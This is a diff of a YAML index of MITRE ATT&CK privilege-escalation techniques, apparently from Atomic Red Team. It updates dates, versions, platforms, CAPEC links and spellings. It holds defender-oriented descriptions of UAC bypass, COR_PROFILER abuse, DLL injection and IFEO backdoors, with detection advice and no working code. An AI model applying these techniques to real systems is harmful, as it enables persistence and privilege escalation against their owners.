- x_mitre_is_subtechnique: false
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_detection: "Monitor for additions or modifications of mechanisms that
could be used to trigger autostart execution, such as relevant additions to
the Registry. Look for changes that are not correlated with known updates,
@@ -1178,10 +1179,12 @@ privilege-escalation:
Look for abnormal process behavior that may be due to a process loading a
malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line
parameters involved in kernel modification or driver installation."
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - root
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
atomic_tests: []
T1037:
technique:
@@ -1213,12 +1216,13 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-27T16:49:15.953Z'
+ modified: '2020-08-03T16:47:37.240Z'
created: '2017-05-31T21:30:38.910Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- macOS
- Windows
+ - Linux
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
@@ -1227,7 +1231,7 @@ privilege-escalation:
x_mitre_data_sources:
- File monitoring
- Process monitoring
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
atomic_tests: []
T1548.002:
technique:
@@ -1242,7 +1246,7 @@ privilege-escalation:
* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
- name: Bypass User Access Control
+ name: Bypass User Account Control
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
@@ -1295,7 +1299,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-25T19:57:54.510Z'
+ modified: '2020-07-22T21:36:52.458Z'
created: '2020-01-30T14:24:34.977Z'
x_mitre_platforms:
- Windows
@@ -1322,7 +1326,7 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_defense_bypassed:
- Windows User Account Control
identifier: T1548.002
@@ -1546,7 +1550,7 @@ privilege-escalation:
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
- Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+ Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335
type: attack-pattern
kill_chain_phases:
@@ -1815,6 +1819,15 @@ privilege-escalation:
name: command_prompt
T1078.004:
technique:
+ id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
+ description: |-
+ Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
+
+ Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
+ name: Cloud Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.004
@@ -1831,15 +1844,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
description: Microsoft. (n.d.). Deploying Active Directory Federation Services
in Azure. Retrieved March 13, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
-
- Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
- id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -1850,21 +1854,8 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.729Z'
+ modified: '2020-10-19T16:01:22.090Z'
created: '2020-03-13T20:36:57.378Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -1872,6 +1863,19 @@ privilege-escalation:
- SaaS
- Azure AD
- Office 365
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
+ or malicious behavior, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.1'
atomic_tests: []
T1546.015:
technique:
@@ -2000,34 +2004,6 @@ privilege-escalation:
atomic_tests: []
T1543:
technique:
- created: '2020-01-10T16:03:18.865Z'
- modified: '2020-03-25T22:32:16.537Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- type: attack-pattern
- id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
- description: "Adversaries may create or modify system-level processes to repeatedly
- execute malicious payloads as part of persistence. When operating systems
- boot up, they can start processes that perform background system functions.
- On Windows and Linux, these system processes are referred to as services.
- (Citation: TechNet Services) On macOS, launchd processes known as [Launch
- Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001)
- are run to finish system initialization and load user specific parameters.(Citation:
- AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services,
- daemons, or agents that can be configured to execute at startup or a repeatable
- interval in order to establish persistence. Similarly, adversaries may modify
- existing services, daemons, or agents to achieve the same effect. \n\nServices,
- daemons, or agents may be created with administrator privileges but executed
- under root/SYSTEM privileges. Adversaries may leverage this functionality
- to create or modify system processes in order to escalate privileges. (Citation:
- OSX Malware Detection). "
- name: Create or Modify System Process
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1543
@@ -2043,10 +2019,42 @@ privilege-escalation:
description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
OS X Malware Detection & Analysis. Retrieved July 10, 2017.'
source_name: OSX Malware Detection
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Create or Modify System Process
+ description: "Adversaries may create or modify system-level processes to repeatedly
+ execute malicious payloads as part of persistence. When operating systems
+ boot up, they can start processes that perform background system functions.
+ On Windows and Linux, these system processes are referred to as services.
+ (Citation: TechNet Services) On macOS, launchd processes known as [Launch
+ Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001)
+ are run to finish system initialization and load user specific parameters.(Citation:
+ AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services,
+ daemons, or agents that can be configured to execute at startup or a repeatable
+ interval in order to establish persistence. Similarly, adversaries may modify
+ existing services, daemons, or agents to achieve the same effect. \n\nServices,
+ daemons, or agents may be created with administrator privileges but executed
+ under root/SYSTEM privileges. Adversaries may leverage this functionality
+ to create or modify system processes in order to escalate privileges. (Citation:
+ OSX Malware Detection). "
+ id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ modified: '2020-10-09T13:46:29.922Z'
+ created: '2020-01-10T16:03:18.865Z'
+ x_mitre_data_sources:
+ - Windows event logs
+ - Windows Registry
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_detection: "Monitor for changes to system processes that do not correlate
with known software, patch cycles, etc., including by comparing results against
a trusted system baseline. New, benign system processes may be created during
@@ -2059,14 +2067,10 @@ privilege-escalation:
process call trees from known services and for execution of other commands
that could relate to Discovery or other adversary techniques. \n\nMonitor
for changes to files associated with system-level processes."
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Windows event logs
- - Windows Registry
- - File monitoring
- - Process command-line parameters
- - Process monitoring
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
atomic_tests: []
T1053.003:
technique:
@@ -2305,9 +2309,9 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1574.002
url: https://attack.mitre.org/techniques/T1574/002
- - external_id: CAPEC-capec
+ - external_id: CAPEC-641
source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
+ url: https://capec.mitre.org/data/definitions/641.html
- source_name: About Side by Side Assemblies
url: https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies-
description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved
@@ -2335,7 +2339,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:05:42.513Z'
+ modified: '2020-10-17T15:15:27.807Z'
created: '2020-03-13T19:41:37.908Z'
x_mitre_defense_bypassed:
- Anti-virus
@@ -2394,6 +2398,9 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1078.001
url: https://attack.mitre.org/techniques/T1078/001
+ - external_id: CAPEC-70
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/70.html
- source_name: Microsoft Local Accounts Feb 2019
url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts
description: Microsoft. (2018, December 9). Local Accounts. Retrieved February
@@ -2420,9 +2427,9 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:37:34.567Z'
+ modified: '2020-09-16T19:41:43.491Z'
created: '2020-03-13T20:15:31.974Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -2473,31 +2480,13 @@ privilege-escalation:
elevation_required: true
T1078.002:
technique:
- created: '2020-03-13T20:21:54.758Z'
- modified: '2020-03-23T21:08:40.063Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- type: attack-pattern
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- name: Domain Accounts
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
url: https://attack.mitre.org/techniques/T1078/002
+ - external_id: CAPEC-560
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/560.html
- url: https://technet.microsoft.com/en-us/library/dn535501.aspx
description: Microsoft. (2016, April 15). Attractive Accounts for Credential
Theft. Retrieved June 3, 2016.
@@ -2510,22 +2499,43 @@ privilege-escalation:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
- - Process monitoring
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domain Accounts
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ modified: '2020-09-16T19:42:11.787Z'
+ created: '2020-03-13T20:21:54.758Z'
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1574.004:
technique:
@@ -2544,9 +2554,9 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1574.004
url: https://attack.mitre.org/techniques/T1574/004
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-471
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/471.html
- url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved
July 10, 2017.
@@ -2563,7 +2573,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:06:47.115Z'
+ modified: '2020-09-16T16:48:09.391Z'
created: '2020-03-16T15:23:30.896Z'
x_mitre_platforms:
- macOS
@@ -2584,7 +2594,31 @@ privilege-escalation:
atomic_tests: []
T1055.001:
technique:
- id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
+ created: '2020-01-14T01:26:08.145Z'
+ modified: '2020-06-20T22:17:59.148Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1055.001
+ url: https://attack.mitre.org/techniques/T1055/001
+ - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ source_name: Endgame Process Injection July 2017
+ - url: https://www.endgame.com/blog/technical-blog/hunting-memory
+ description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December
+ 7, 2017.
+ source_name: Endgame HuntingNMemory June 2017
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Dynamic-link Library Injection
description: "Adversaries may inject dynamic-link libraries (DLLs) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
DLL injection is a method of executing arbitrary code in the address space
@@ -2604,35 +2638,17 @@ privilege-escalation:
to the process's memory, system/network resources, and possibly elevated privileges.
Execution via DLL injection may also evade detection from security products
since the execution is masked under a legitimate process. "
- name: Dynamic-link Library Injection
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1055.001
- url: https://attack.mitre.org/techniques/T1055/001
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Endgame Process Injection July 2017
- - url: https://www.endgame.com/blog/technical-blog/hunting-memory
- description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December
- 7, 2017.
- source_name: Endgame HuntingNMemory June 2017
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-06-20T22:17:59.148Z'
- created: '2020-01-14T01:26:08.145Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - DLL monitoring
+ - File monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -2647,16 +2663,10 @@ privilege-escalation:
if a process is performing actions it usually does not, such as opening network
connections, reading files, or other suspicious actions that could relate
to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - DLL monitoring
- - File monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Application control
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1548.004:
technique:
@@ -2815,6 +2825,18 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1546
url: https://attack.mitre.org/techniques/T1546
+ - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
+ description: Ballenthin, W., et al. (2015). Windows Management Instrumentation
+ (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
+ source_name: FireEye WMI 2015
+ - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf
+ description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite.
+ Retrieved July 10, 2017.
+ source_name: Malware Persistence on OS X
+ - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux
+ Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018.
+ source_name: amnesia malware
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -2826,8 +2848,9 @@ privilege-escalation:
may abuse these mechanisms as a means of maintaining persistent access to
a victim via repeatedly executing malicious code. After gaining access to
a victim system, adversaries may create/modify event triggers to point to
- malicious content that will be executed whenever the event trigger is invoked.
- \n\nSince the execution can be proxied by an account with higher permissions,
+ malicious content that will be executed whenever the event trigger is invoked.(Citation:
+ FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia
+ malware)\n\nSince the execution can be proxied by an account with higher permissions,
such as SYSTEM or service accounts, an adversary may be able to abuse these
triggered execution mechanisms to escalate their privileges. "
id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db
@@ -2837,9 +2860,9 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-07-09T13:55:51.501Z'
+ modified: '2020-10-21T18:48:27.576Z'
created: '2020-01-22T21:04:23.285Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: false
x_mitre_detection: "Monitoring for additions or modifications of mechanisms
that could be used to trigger event-based execution, especially the addition
@@ -2903,7 +2926,7 @@ privilege-escalation:
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
- Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
+ Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979
type: attack-pattern
kill_chain_phases:
@@ -3205,7 +3228,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-26T16:09:59.324Z'
+ modified: '2020-10-17T15:15:28.288Z'
created: '2020-03-12T20:38:12.465Z'
x_mitre_data_sources:
- Environment variable
@@ -3280,11 +3303,11 @@ privilege-escalation:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Image File Execution Options Injection
description: |-
- Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IEFO) debuggers. IEFOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)
+ Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
- IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
+ IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
@@ -3298,15 +3321,15 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T19:39:50.839Z'
+ modified: '2020-08-26T14:18:08.480Z'
created: '2020-01-24T15:05:58.384Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
- SYSTEM
x_mitre_detection: |-
- Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
+ Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
